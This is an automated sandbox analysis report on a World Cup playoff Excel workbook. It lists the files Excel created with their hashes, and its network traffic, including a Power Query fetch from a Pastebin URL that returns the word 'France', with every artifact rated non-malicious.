Process:C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXE
File Type:Zip archive data, at least v1.0 to extract
Size (bytes):2484
Entropy (8bit):5.524272474297159
Encrypted:false
MD5:DA1DB278262E15C86C812CAA118EE64E
SHA1:11FFF3AB86981C2B01F10C02772913C80CF4D421
SHA-256:CE2D6CD009EFADF2C06A4CA3787BE7B9002C2EA703AA9FF38433DE65E12ABB5A
SHA-512:6488ED6F73A383C2298E56B3F33A4C89E147A0CF64BDE4B45A5284F783868F00B0DF16D4BA212B1F24EE49990F8D96378BD36DA36E531F4532E3FA17837FC70C
Malicious:false
Reputation:low
Preview:PK........9t.M.(5.........%...UserCorrelation/UserCorrelationID.xml ...(........................<?xml version="1.0" encoding="utf-8"?><UserCorrelationID xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><CorrelationID>e5ff1b18-b888-431f-a1e1-a9ded562441c</CorrelationID></UserCorrelationID>PK........:t.M..............[Content_Types].xml ...(........................<?xml version="1.0" encoding="utf-8"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="xml" ContentType="text/xml" /></Types>PK........Ap.N;..^C...C.......UserInterface/Settings.xml ...(........................<?xml version="1.0" encoding="utf-8"?><UISettingsConfig xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><Entries><Entry Type="SearchHistory" Value="s{&quot;SearchHistoryEntries&quot;:[]}" /><Entry Type="FormulaBuilderHistory" Value="s[]" /></Entries></UISettingsConfig>
C:\Users\user\AppData\Local\Microsoft\Power Query\temp.User.zip
Process:C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXE
File Type:Zip archive data, at least v1.0 to extract
Size (bytes):2484
Entropy (8bit):5.524272474297159
Encrypted:false
MD5:DA1DB278262E15C86C812CAA118EE64E
SHA1:11FFF3AB86981C2B01F10C02772913C80CF4D421
SHA-256:CE2D6CD009EFADF2C06A4CA3787BE7B9002C2EA703AA9FF38433DE65E12ABB5A
SHA-512:6488ED6F73A383C2298E56B3F33A4C89E147A0CF64BDE4B45A5284F783868F00B0DF16D4BA212B1F24EE49990F8D96378BD36DA36E531F4532E3FA17837FC70C
Malicious:false
Reputation:low
Preview:PK........9t.M.(5.........%...UserCorrelation/UserCorrelationID.xml ...(........................<?xml version="1.0" encoding="utf-8"?><UserCorrelationID xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><CorrelationID>e5ff1b18-b888-431f-a1e1-a9ded562441c</CorrelationID></UserCorrelationID>PK........:t.M..............[Content_Types].xml ...(........................<?xml version="1.0" encoding="utf-8"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="xml" ContentType="text/xml" /></Types>PK........Ap.N;..^C...C.......UserInterface/Settings.xml ...(........................<?xml version="1.0" encoding="utf-8"?><UISettingsConfig xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><Entries><Entry Type="SearchHistory" Value="s{&quot;SearchHistoryEntries&quot;:[]}" /><Entry Type="FormulaBuilderHistory" Value="s[]" /></Entries></UISettingsConfig>
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EAYYUSJB\PX31NCah[1].txt
Process:C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXE
File Type:ASCII text, with no line terminators
Size (bytes):6
Entropy (8bit):2.584962500721156
Encrypted:false
MD5:0309A6C666A7A803FDB9DB95DE71CF01
SHA1:E3772AC4B4DB87B4A8DBFA59EF43CD1A8AD29515
SHA-256:7A1CA4EF7515F7276BAE7230545829C27810C9D9E98AB2C06066BEE6270D5153
SHA-512:F4A0036E39048EEC506221E517EBF2A73D37FF9316A6CB8A3A7931D6C947AF8FAB6AD67F8FFB29E8368346BA03776AC6F59D0FE916EA2333806201E83B2B6F90
Malicious:false
Reputation:low
Preview:France
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\0PUBVDYD.txt
Process:C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXE
File Type:ASCII text
Size (bytes):113
Entropy (8bit):4.420861574546612
Encrypted:false
MD5:5E2F506F6AF259F9840AE5CDEBC094EB
SHA1:C37B1510FAB9EAE7B3C532BCDD564710E5B96F6A
SHA-256:CE43462C29F57B5450EB6430BFE7FEA98928609B950C73D8BCAF3B4B9D145DBC
SHA-512:918A5D50F786A3F5A488B5F7FEAE14CCE00F2CEC884FAB56336B91B63854D42629D0C7547E8C42526B891A599AB692CBF9132CCDB41F31D9050FD1955396B255
Malicious:false
Reputation:low
Preview:__cfduid.d077fe119c9a9683a5d83d489f4961b011561723337.pastebin.com/.9728.3446270592.30821498.951854392.30748073.*.
C:\Users\user\Desktop\~$FIFA World Cup 2018 - Play offs.xlsx
Process:C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXE
File Type:data
Size (bytes):165
Entropy (8bit):1.8365963555552802
Encrypted:false
MD5:5822E168D778D80B9466A54204F2161E
SHA1:CE1E40071C16A0CC9C3ABB413AF7C248DFDDF52B
SHA-256:CEBDA0490B50C36E193E69BF903F65366718DC4B0C91CC5A2F45510AC7196C32
SHA-512:0A5E8C1DE75262FD0ACC5B717D83767CFFEA8ECD3123713952084B674F81A4E167BAC899886F349F6B098772624C81807F36EA8D8F8D452DC8DDF7CCB8B44F4B
Malicious:false
Reputation:moderate, very likely benign file
Preview:.user ..l.u.k.e.t.a.y.l.o.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Domains and IPs

Contacted Domains

Name: pastebin.com
IP: 104.20.208.21
Active: true
Malicious: false
Reputation: high

Contacted URLs

Name: https://pastebin.com/raw/PX31NCah
Malicious: false
Reputation: high

    Contacted IPs

    Public

IP: 104.20.208.21
Country: United States
ASN: 13335
ASN Name: unknown
Malicious: false

    Static File Info

    General

    File type:Microsoft Excel 2007+
    Entropy (8bit):7.343749225647534
    TrID:
    • Excel Microsoft Office Open XML Format document (50504/1) 86.33%
    • ZIP compressed archive (8000/1) 13.67%
    File name:FIFA World Cup 2018 - Play offs.xlsx
    File size:15957
    MD5:5d1d8c417915042f8ff85fa7af619696
    SHA1:e45c9c421a5c529b48881774788a6b9f46fdd8a9
    SHA256:d8ff705565030ed311f18cc7637f918b2d98cd01f7fb5f65d197e4c6d20dcc1d
    SHA512:b7fbc7bc3848da0ba9dd0a41527121a678df68afa14d50e82b0a75b05d69255e9c99fc6bbac460b58600c41d6c219e082c0a5bfc63951360db8965b0253b3249
    SSDEEP:384:7nXxj8H7sDJZq5noCziL+msVUlM9zhmPq/dCfqlgtNvZ:bXxjS0qnT+cVxlsq/0f/bvZ
    File Content Preview:PK..........!..a.|............[Content_Types].xml ...(.........................................................................................................................................................................................................

    File Icon

    Icon Hash:74ecd0d2d6d6d0dc

    Network Behavior

    Network Port Distribution

    TCP Packets


    UDP Packets


    DNS Queries

  • Timestamp: Jun 28, 2019 14:02:16.717029095 CEST; Source IP: 192.168.1.94; Dest IP: 8.8.8.8; Trans ID: 0xdb5; OP Code: Standard query (0); Name: pastebin.com; Type: A (IP address); Class: IN (0x0001)

    DNS Answers

  • Timestamp: Jun 28, 2019 14:01:38.640850067 CEST; Source IP: 8.8.8.8; Dest IP: 192.168.1.94; Trans ID: 0xcb1e; Reply Code: No error (0); Name: 2-01-4ca6-0004.cdx.cedexis.net; CName: main.dl.ms.akadns.net; Type: CNAME (Canonical name); Class: IN (0x0001)
  • Timestamp: Jun 28, 2019 14:01:38.667884111 CEST; Source IP: 8.8.8.8; Dest IP: 192.168.1.94; Trans ID: 0x7aa4; Reply Code: No error (0); Name: 2-01-4ca6-0004.cdx.cedexis.net; CName: main.dl.ms.akadns.net; Type: CNAME (Canonical name); Class: IN (0x0001)
  • Timestamp: Jun 28, 2019 14:02:16.730118990 CEST; Source IP: 8.8.8.8; Dest IP: 192.168.1.94; Trans ID: 0xdb5; Reply Code: No error (0); Name: pastebin.com; Address: 104.20.208.21; Type: A (IP address); Class: IN (0x0001)
  • Timestamp: Jun 28, 2019 14:02:16.730118990 CEST; Source IP: 8.8.8.8; Dest IP: 192.168.1.94; Trans ID: 0xdb5; Reply Code: No error (0); Name: pastebin.com; Address: 104.20.209.21; Type: A (IP address); Class: IN (0x0001)

    HTTP Request Dependency Graph

    • pastebin.com

    HTTPS Proxied Packets

Session ID: 0
Source: 192.168.1.94:49196
Destination: 104.20.208.21:443
Process: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXE

2019-06-28 12:02:17 UTC (0 kBytes transferred) OUT:
OPTIONS /raw/ HTTP/1.1
X-IDCRL_ACCEPTED: t
User-Agent: Microsoft Office Protocol Discovery
Host: pastebin.com
Content-Length: 0
Connection: Keep-Alive

2019-06-28 12:02:17 UTC (0 kBytes transferred) IN:
HTTP/1.1 200 OK
Date: Fri, 28 Jun 2019 12:02:17 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: __cfduid=d077fe119c9a9683a5d83d489f4961b011561723337; expires=Sat, 27-Jun-20 12:02:17 GMT; path=/; domain=.pastebin.com; HttpOnly
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Server: cloudflare
CF-RAY: 4edf82c95f14cc3a-ZRH

2019-06-28 12:02:17 UTC (0 kBytes transferred) IN:
Data Raw: 31 33 0d 0a 45 72 72 6f 72 20 77 69 74 68 20 74 68 69 73 20 49 44 21 0d 0a
Data Ascii: 13Error with this ID!

2019-06-28 12:02:17 UTC (0 kBytes transferred) IN:
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 1
Source: 192.168.1.94:49197
Destination: 104.20.208.21:443
Process: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXE

2019-06-28 12:02:17 UTC (0 kBytes transferred) OUT:
GET /raw/PX31NCah HTTP/1.1
Accept: text/html, text/plain, text/xml
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office)
Accept-Encoding: gzip, deflate
Host: pastebin.com
Connection: Keep-Alive
Cookie: __cfduid=d077fe119c9a9683a5d83d489f4961b011561723337

2019-06-28 12:02:17 UTC (1 kBytes transferred) IN:
HTTP/1.1 200 OK
Date: Fri, 28 Jun 2019 12:02:17 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Cache-Control: public, max-age=1801
X-XSS-Protection: 1; mode=block
CF-Cache-Status: EXPIRED
Expires: Fri, 28 Jun 2019 12:32:18 GMT
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Server: cloudflare
CF-RAY: 4edf82cb7d88cc3e-ZRH

2019-06-28 12:02:17 UTC (1 kBytes transferred) IN:
Data Raw: 36 0d 0a 46 72 61 6e 63 65 0d 0a
Data Ascii: 6France

2019-06-28 12:02:17 UTC (1 kBytes transferred) IN:
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


    System Behavior

    General

    Start time:14:00:27
    Start date:28/06/2019
    Path:C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXE
    Wow64 process (32bit):false
    Commandline:'C:\Program Files\Microsoft Office 15\Root\Office15\EXCEL.EXE' /automation -Embedding
    Imagebase:0x240000
    File size:25749600 bytes
    MD5 hash:D49DA5A2EE723A5D236D4DD6059C37CB
    Has administrator privileges:true
    Programmed in:.Net C# or VB.NET
    Reputation:low
